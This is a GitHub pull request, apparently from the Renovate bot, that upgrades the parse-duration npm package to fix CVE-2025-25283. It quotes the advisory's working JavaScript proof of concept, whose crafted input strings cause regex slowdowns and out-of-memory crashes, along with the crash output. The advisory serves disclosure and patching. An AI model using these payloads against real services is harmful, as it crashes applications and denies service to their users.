Skip to content

fix(deps): update dependency parse-duration to v2 [security] - autoclosed#478

Closed
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-parse-duration-vulnerability
Closed

fix(deps): update dependency parse-duration to v2 [security] - autoclosed#478
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-parse-duration-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Feb 12, 2025

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
parse-duration 1.1.2 -> 2.1.3 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2025-25283

Summary

This report finds 2 availability issues due to the regex used in the parse-duration npm package:

  1. An event loop delay due to the CPU-bound operation of resolving the provided string, from a 0.5ms and up to ~50ms per one operation, with a varying size from 0.01 MB and up to 4.3 MB respectively.
  2. An out of memory that would crash a running Node.js application due to a string size of roughly 10 MB that utilizes unicode characters.

PoC

Refer to the following proof of concept code that provides a test case and makes use of the regular expression in the library as its test case to match against strings:

// Vulnerable regex to use from the library:
import parse from './index.js'

function generateStressTestString(length, decimalProbability) {
  let result = "";
  for (let i = 0; i < length; i++) {
    if (Math.random() < decimalProbability) {
      result += "....".repeat(99);
    }
    result += Math.floor(Math.random() * 10);
  }
  return result;
}

function getStringSizeInMB_UTF8(str) {
  const sizeInBytes = Buffer.byteLength(str, 'utf8');
  const sizeInMB = sizeInBytes / (1024 * 1024);
  return sizeInMB;
}

// Generate test strings with varying length and decimal probability:
const longString1 = generateStressTestString(380, 0.05);
const longString2 = generateStressTestString(10000, 0.9);
const longString3 = generateStressTestString(500000, 1);
const longStringVar1 = '-1e' + '-----'.repeat(915000)
const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(5225000)

function testRegex(str) {
  const startTime = performance.now();
  // one of the regex's used in the library:
  // const durationRE = /(-?(?:\d+\.?\d*|\d*\.?\d+)(?:e[-+]?\d+)?)\s*([\p{L}]*)/giu;
  // const match = durationRE.test(str);
  // but we will use the exported library code directly:
  const match = parse(str);
  const endTime = performance.now();
  const timeTaken = endTime - startTime;
  return { timeTaken, match };
}

// Test the long strings:
let result = {}

{
  console.log(
    `\nRegex test on string of length ${longString1.length} (size: ${getStringSizeInMB_UTF8(longString1).toFixed(2)} MB):`
  );
  result = testRegex(longString1);
  console.log(
    `   matched: ${result.match}, time taken: ${result.timeTaken}ms`
  );
}

{
  console.log(
    `\nRegex test on string of length ${longString2.length} (size: ${getStringSizeInMB_UTF8(longString2).toFixed(2)} MB):`
  );
  result = testRegex(longString2 + "....".repeat(100) + "5сек".repeat(9000));
  console.log(
    `   matched: ${result.match}, time taken: ${result.timeTaken}ms`
  );
}

{
  console.log(
    `\nRegex test on string of length ${longStringVar1.length} (size: ${getStringSizeInMB_UTF8(longStringVar1).toFixed(2)} MB):`
  );
  result = testRegex(longStringVar1);
  console.log(
    `   matched: ${result.match}, time taken: ${result.timeTaken}ms`
  );
}

{
  console.log(
    `\nRegex test on string of length ${longString3.length} (size: ${getStringSizeInMB_UTF8(longString3).toFixed(2)} MB):`
  );
  result = testRegex(longString3 + '.'.repeat(10000) + " 5сек".repeat(9000));
  console.log(
    `   matched: ${result.match}, time taken: ${result.timeTaken}ms`
  );
}

{
  console.log(
    `\nRegex test on string of length ${longStringVar2.length} (size: ${getStringSizeInMB_UTF8(longStringVar2).toFixed(2)} MB):`
  );
  result = testRegex(longStringVar2);
  console.log(
    `   matched: ${result.match}, time taken: ${result.timeTaken}ms`
  );
}

The results of this on the cloud machine that I ran this on are as follows:

@&#8203;lirantal ➜ /workspaces/parse-duration (master) $ node redos.js 

Regex test on string of length 6320 (size: 0.01 MB):
   matched: 5997140778.000855, time taken: 0.9271340000000237ms

Regex test on string of length 3561724 (size: 3.40 MB):
   matched: 0.0006004999999999999, time taken: 728.7693149999999ms

Regex test on string of length 4575003 (size: 4.36 MB):
   matched: null, time taken: 43.713984999999866ms

Regex test on string of length 198500000 (size: 189.30 MB):

<--- Last few GCs --->

[34339:0x7686430]    14670 ms: Mark-Compact (reduce) 2047.4 (2073.3) -> 2047.4 (2074.3) MB, 1396.70 / 0.01 ms  (+ 0.1 ms in 62 steps since start of marking, biggest step 0.0 ms, walltime since start of marking 1430 ms) (average mu = 0.412, current mu = 0.[34339:0x7686430]    17450 ms: Mark-Compact (reduce) 2048.4 (2074.3) -> 2048.4 (2075.3) MB, 2777.68 / 0.00 ms  (average mu = 0.185, current mu = 0.001) allocation failure; scavenge might not succeed

<--- JS stacktrace --->

FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
----- Native stack trace -----

 1: 0xb8d0a3 node::OOMErrorHandler(char const*, v8::OOMDetails const&) [node]
 2: 0xf06250 v8::Utils::ReportOOMFailure(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [node]
 3: 0xf06537 v8::internal::V8::FatalProcessOutOfMemory(v8::internal::Isolate*, char const*, v8::OOMDetails const&) [node]
 4: 0x11180d5  [node]
 5: 0x112ff58 v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollectionReason, v8::GCCallbackFlags) [node]
 6: 0x1106071 v8::internal::HeapAllocator::AllocateRawWithLightRetrySlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [node]
 7: 0x1107205 v8::internal::HeapAllocator::AllocateRawWithRetryOrFailSlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [node]
 8: 0x10e4856 v8::internal::Factory::NewFillerObject(int, v8::internal::AllocationAlignment, v8::internal::AllocationType, v8::internal::AllocationOrigin) [node]
 9: 0x1540686 v8::internal::Runtime_AllocateInYoungGeneration(int, unsigned long*, v8::internal::Isolate*) [node]
10: 0x1979ef6  [node]
Aborted (core dumped)

You can note that:

  1. 0.01 MB of input was enough to cause a 1ms delay (0.92ms)
  2. Ranging from either 3 MB to 4 MB of input results in almost a full second day (728ms) and 42 ms, depending on the characters used in the text passed to the library's parse() function
  3. A 200 MB of input size already causes JavaScript heap out of memory crash

However, more interestingly, if we focus on the input string case:

const longStringVar2 = "1" + "0".repeat(500) + "e1" + "α".repeat(5225000)

Even though this is merely 10 MB of size (9.97 MB) it results in an out of memory issue due to the recursive nature of the regular expression matching:

Regex test on string of length 5225503 (size: 9.97 MB):
file:///workspaces/parse-duration/index.js:21
    .replace(durationRE, (_, n, units) => {
     ^

RangeError: Maximum call stack size exceeded
    at String.replace (<anonymous>)
    at parse (file:///workspaces/parse-duration/index.js:21:6)
    at testRegex (file:///workspaces/parse-duration/redos.js:35:17)
    at file:///workspaces/parse-duration/redos.js:89:12
    at ModuleJob.run (node:internal/modules/esm/module_job:234:25)
    at async ModuleLoader.import (node:internal/modules/esm/loader:473:24)
    at async asyncRunEntryPointWithESMLoader (node:internal/modules/run_main:122:5)

Node.js v20.18.1

To note, the issue at hand may not just be the primary regex in use but rather the reliance of the various replace functions in the parse() function which create copies of the input in memory.

Impact

  • I agree, a 200 MB (perhaps even less if we perform more tests to find the actual threshold) is a large amount of data to send over a network and hopefully is unlikely to hit common application usage.
  • In the case of the specialized input string case that uses a UTF-8 character it is only requires up to 10 MB of request size to cause a RangeError exception for a running Node.js application, which I think is more applicable and common to allow such input sizes for POST requests and other types.
  • Even for the smaller payloads such as 0.01 MB which aligns with Express's default of 100kb request limit size it causes a 1ms delay. Now imagine if an application is running without proper security controls such as rate limits, and attackers send 1000s of concurrent requests which quickly turn the 1ms delay into seconds worth of delay for a running application. The 3 MB payload already shows a 0.5s delay in one request.

Release Notes

jkroso/parse-duration (parse-duration)

v2.1.3

Compare Source

What's Changed
  • Better performance / memory #​61
  • Safer RE #​61
  • Customizable placeholders
  • Type declaraion for rewriting units #​62

Full Changelog: jkroso/parse-duration@v2.1.2...v2.1.3

v2.1.2

Compare Source

What's Changed
  • Fixed type definitions
  • Added abbrs mo, mth, microsec, nanosec
  • Removed b abbr
  • Removed μ as greek mu in favor of &micro; left in default set

Full Changelog: jkroso/parse-duration@v2.1.1...v2.1.2

v2.1.1

Compare Source

v2.1.0

Compare Source

v2.0.2

Compare Source

v2.0.1

Compare Source

v2.0.0

Compare Source

  • Introduces locales
  • Moves units into parse.unit object #​56
  • Abandons CJS format in favour of ESM
  • Adds locale-dependent group/decimal separator #​35

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 6d65916 to d489b4f Compare February 13, 2025 11:36
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from d489b4f to 2733aed Compare February 14, 2025 03:51
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 2733aed to b03778f Compare February 27, 2025 06:49
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from b03778f to a53f602 Compare February 27, 2025 11:32
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from a53f602 to fb4902d Compare February 27, 2025 23:30
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from fb4902d to a1df955 Compare March 2, 2025 13:25
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from a1df955 to e3ed9a3 Compare March 2, 2025 13:57
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from e3ed9a3 to 30c9bf0 Compare March 2, 2025 14:40
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 30c9bf0 to c6c57ff Compare March 2, 2025 15:31
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from c6c57ff to 1fbcf86 Compare March 2, 2025 17:56
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 1fbcf86 to 416fcd6 Compare March 3, 2025 07:04
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 416fcd6 to 2bd3f73 Compare March 3, 2025 07:33
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 2bd3f73 to 97e52b6 Compare March 6, 2025 07:26
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 97e52b6 to effaa53 Compare March 6, 2025 07:36
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from effaa53 to 8d0950f Compare March 6, 2025 19:14
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 8d0950f to 2dca722 Compare March 6, 2025 22:46
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 2dca722 to 0cc761f Compare March 13, 2025 06:14
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from 0cc761f to e5e2887 Compare March 13, 2025 09:36
@renovate renovate bot force-pushed the renovate/npm-parse-duration-vulnerability branch from e5e2887 to 53e4866 Compare March 13, 2025 22:16
@renovate renovate bot changed the title fix(deps): update dependency parse-duration to v2 [security] fix(deps): update dependency parse-duration to v2 [security] - autoclosed Mar 15, 2025
@renovate renovate bot closed this Mar 15, 2025
@renovate renovate bot deleted the renovate/npm-parse-duration-vulnerability branch March 15, 2025 21:22
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants